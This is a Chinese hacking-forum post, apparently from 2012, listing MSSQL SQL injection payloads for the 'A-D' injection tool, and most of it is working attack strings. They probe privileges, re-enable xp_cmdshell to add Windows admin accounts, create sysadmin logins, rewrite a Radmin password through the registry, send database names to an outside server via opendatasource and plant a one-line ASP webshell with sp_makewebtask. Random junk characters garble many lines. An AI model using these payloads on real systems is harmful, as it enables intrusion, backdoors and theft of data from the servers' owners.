找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1952|回复: 0
打印 上一主题 下一主题

阿D常用的一些注入命令

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:26:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
阿D常用的一些注入命令
' b' t1 l* C' _6 ?0 y//看看是什么权限的3 f: o' i* f* |' |% s9 W
and 1=(Select IS_MEMBER('db_owner'))4 R( Q( U, Q' e* ?( N/ e: M
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--6 f9 Q& a  J9 v! F  L

% v! m4 M+ C  X+ ~# C( g//检测是否有读取某数据库的权限
2 Q9 N( t, H, y  I; Z( Z7 I0 zand 1= (Select HAS_DBACCESS('master'))
4 x0 ^  m" O( M& MAnd char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
4 |; o4 m% G; a# M( j+ u: ?) l' j7 C; t: _; y! F6 W) U% G$ }
  Z4 X2 m* A) M* W' C
数字类型
  l* a# H4 w6 V( R+ H7 Y( C% Uand char(124)%2Buser%2Bchar(124)=0. F6 O! B3 C+ J3 f" O
1 r: m2 }( h8 r7 S, I- a. q
字符类型) l! j4 A! i! X' s5 H8 r- X" K
' and char(124)%2Buser%2Bchar(124)=0 and ''='
5 I: m# ^8 ?( s, U* s" V  S8 w( f7 n& P
搜索类型* W. r; o' A9 S
' and char(124)%2Buser%2Bchar(124)=0 and '%'='
; w4 X0 o- A$ G# h7 E% {- }( J* |' ^2 \
爆用户名( ]2 {* |( K2 @* b% i8 M/ e- d
and user>0
3 }* @" i3 V9 h0 u" A2 @# \5 R/ e' and user>0 and ''='- I4 M( i0 k4 Z, H

3 a9 j" m9 N% s* I# [检测是否为SA权限: N$ I' P1 O0 P$ V; |+ G( {
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--" G- S0 y) F* m8 @/ A
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --9 ~) f0 a' u6 c8 }7 k1 i
/ H; k; G, q/ q- U& [( B3 ]
检测是不是MSSQL数据库4 s) Y3 |) {6 c: @
and exists (select * from sysobjects);-- ' `7 k" \& @, a% H+ e: F1 L2 \# r

( A2 Y; L' d8 c! ?+ @5 w" W检测是否支持多行3 S0 s) ^  G+ ?/ C
;declare @d int;--
$ ?5 H. ^4 g$ v2 v, S7 i) q0 k2 [# b  L9 K1 D/ H3 {5 R( s. w
恢复 xp_cmdshell0 N( R# J  u+ i2 C& @/ u0 s; a
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
# [* v6 L  i3 w5 D) R; W9 R7 y% z; d! J8 q# s; Z  I4 W

7 U" r  X* |( o8 ^1 |- Wselect * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
! `9 V1 ~. T1 Q( t1 `( N/ N. D" q7 t! B
//-----------------------
" K% j" t4 G# H: G1 M3 Y: x//      执行命令
. o1 W* S0 z0 j# U# Q+ x8 x//-----------------------8 [% r' h% S8 q% J8 F' {
首先开启沙盘模式:
3 R" Y5 u0 |% S# i  f+ Lexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1- Y7 N0 B# \; j# ~
- s( y# t5 v8 ^  E) Z0 g
然后利用jet.oledb执行系统命令
6 c8 h. z" e7 L0 K' V% \- Uselect * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
. v: ~- J# m' ?( ^( u; B4 Y5 h& A" `+ I
执行命令& W& K* w) K6 O- `0 g+ f* \
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--' x) P$ A" h) B4 K$ X. v

3 Y- t: d4 r! ~# }  p! i6 BEXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'5 }3 C9 N$ p. L

0 O6 {6 W3 E- N# I判断xp_cmdshell扩展存储过程是否存在:
/ ?. }6 [  n/ ?4 phttp://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
1 k: P. v# Y! X% ~2 \+ J+ I" Q, ]+ S. f8 g  C& w; X, s" e; P
写注册表
5 B7 w  R+ w6 a, e; Oexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1! K2 R8 `+ Z- z, x* Z$ a. t2 c

0 O1 |; F2 e; f. d; z; {REG_SZ# A0 ^0 }! k+ p! s0 @; |$ S
& N4 A1 }5 V$ x+ ~0 a* B, o
读注册表
! t0 s. r, j! \# f+ s, X; y# vexec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
% I1 m5 n0 w1 g6 ?: H/ D
  A0 a3 J0 W9 c- ?9 g* C# ~: o读取目录内容% k, _1 F2 C* @7 U  R, Q" `
exec master..xp_dirtree 'c:\winnt\system32\',1,16 j, T6 u, d7 t, X+ _! ~
  x, i3 y2 N: \$ ^/ L- y5 M1 ~6 b
- _  }. X% n4 R1 U1 j9 o
数据库备份( W6 O, l2 Y& C. k# O
backup database pubs to disk = 'c:\123.bak'
3 A" r. W9 u6 V( t% j9 z% M' z9 d+ K( z' u0 H. ]9 S4 e& ^7 D( R
//爆出长度; A7 _7 M+ u9 y& }% j' I+ b2 \, w6 ^, R
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
# R. |1 Q1 Y1 O. s: \: L: z5 Q! I! D  n! }6 G  ]

5 b% f1 i4 U- p6 n7 X- i6 m& U/ i$ V; v, S/ }1 @; m5 i6 r+ G
更改sa口令方法:用sql综合利用工具连接后,执行命令:
. |( }- G, F' Q! A9 r+ A& Pexec sp_password NULL,'新密码','sa'- T, V# `+ O) r3 s3 }
' a* m5 h% ]4 T2 \1 W" C
添加和删除一个SA权限的用户test:
7 Z8 C7 R9 X/ x. D  Vexec master.dbo.sp_addlogin test,ptlove
5 U* A( w/ X  G* u6 j$ [2 j6 Hexec master.dbo.sp_addsrvrolemember test,sysadmin& o& l6 U8 B5 j" G0 x
$ Z7 ~+ S. z, u/ N4 D
删除扩展存储过过程xp_cmdshell的语句:
/ ]$ K. A2 A' T+ K5 f9 ]( n( ?exec sp_dropextendedproc 'xp_cmdshell'
' ]1 a7 h) n6 I: u, x# ?- Y3 h. R
添加扩展存储过过程; V% ?: G8 e, t/ u' h3 f8 ^7 q9 [
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll' ( s( c' g! h: K/ i
GRANT exec On xp_proxiedadata TO public & l3 U0 B3 {+ D6 q
$ w) H* |* t; F" p1 t, e6 k" z
9 f# U5 I  I7 Q) ^5 U+ X
停掉或激活某个服务。 - `) [( I& W( }3 L0 R7 P

1 f% [4 j- M8 S$ P3 A) vexec master..xp_servicecontrol 'stop','schedule'2 ?3 k( Q& Z' D3 Q  W2 Y. y
exec master..xp_servicecontrol 'start','schedule'4 n3 B5 n. O8 L  {+ w7 a9 F

* H" l+ a/ C. z$ G! T" q1 Y- L2 rdbo.xp_subdirs" J- o+ d3 Z! v5 F, B, }

: A- u2 o% V9 I5 K) y$ p只列某个目录下的子目录。3 `7 y- x" S5 _* o  [' x# w
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'+ X; }( z4 ~; ~$ J0 Y

: |& I4 N/ _! M  d* @0 u8 Jdbo.xp_makecab0 }! S# N. g  B; K
8 L. O/ x; u5 `2 k! R+ E6 p, u6 H
将目标多个档案压缩到某个目标档案之内。4 O! ?" i: H7 Q/ f1 \( x( `
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。
# f4 ?7 {" n7 d7 @+ x
/ ]3 S3 G3 @3 C- u# }1 Adbo.xp_makecab
' s6 N2 w8 m" _: F'c:\test.cab','mszip',1,$ m- j# o; G* j" J; ^4 ]: |: y  g( L
'C:\Inetpub\wwwroot\SQLInject\login.asp',6 k4 |/ P7 O5 X6 o
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
7 z4 G* i, m" A8 @5 {! z0 n; Z
6 g4 u, k/ ^$ A8 y( [& s: V. exp_terminate_process- }8 ~) @4 ~+ b* o% k& ?, T
7 {8 h% `* @( e9 K5 \: a
停掉某个执行中的程序,但赋予的参数是 Process ID。
2 X, a; o0 a8 D4 I2 {利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
+ W; f( {5 m& X/ k- y! y" i& \1 o
xp_terminate_process 2484
* P2 K9 D- E" D7 D, v3 c
3 o$ [" S, _. e8 x) K: D$ sxp_unpackcab
% c& q7 {2 F$ y3 H- c4 G4 K
" _3 t# K9 U! [9 H6 e: Y* Q2 J解开压缩档。
1 Q0 q& Z8 y" q/ }% s; n( k% e( z8 V8 U) U4 m6 R) ?
xp_unpackcab 'c:\test.cab','c:\temp',1
. d9 U# {& U  |" ^- q
  l( y2 i" t$ z, Y$ H7 X- P7 L7 e- b7 f7 `( q8 Q) [# g; j9 D
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
% R: w! D3 m0 v0 o( l) E/ p8 F5 X3 |+ x0 s- B6 K6 p
create database lcx;
3 ?; ~& g+ z; ^& YCreate TABLE ku(name nvarchar(256) null);1 K: `( y5 N- N# D; n
Create TABLE biao(id int NULL,name nvarchar(256) null);
% e/ [- I" ~5 m# W% ], W/ P6 |3 i- n" b6 O, D* G- w& s; c
//得到数据库名5 G& q7 r! m8 ]
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
+ c5 \  }( Z+ g5 n  F2 a  I4 F
1 o  z% t+ K& W, F' T8 s
% B$ j% f! F( M. S//在Master中创建表,看看权限怎样
% L6 ~' A7 I$ J/ QCreate TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--! n7 `" t# |8 w3 r5 C' O2 M& z

. J. `. f, A; W- i用 sp_makewebtask直接在web目录里写入一句话马:
& F2 x  i' ?5 I9 t* A9 W' J* K, k7 T9 mhttp://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
7 |6 ]$ R' F8 P5 G/ y- D
5 {- X, [, E+ B! Q//更新表内容1 Z1 }# a& L) u) h
Update films SET kind = 'Dramatic' Where id = 123
9 F' Z7 K# @# L- v1 [; h7 q6 {) N5 N; Q% _( l" y3 D  H# T$ y
//删除内容
5 J( ~& ?' K  K7 }1 hdelete from table_name where Stockid = 3
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表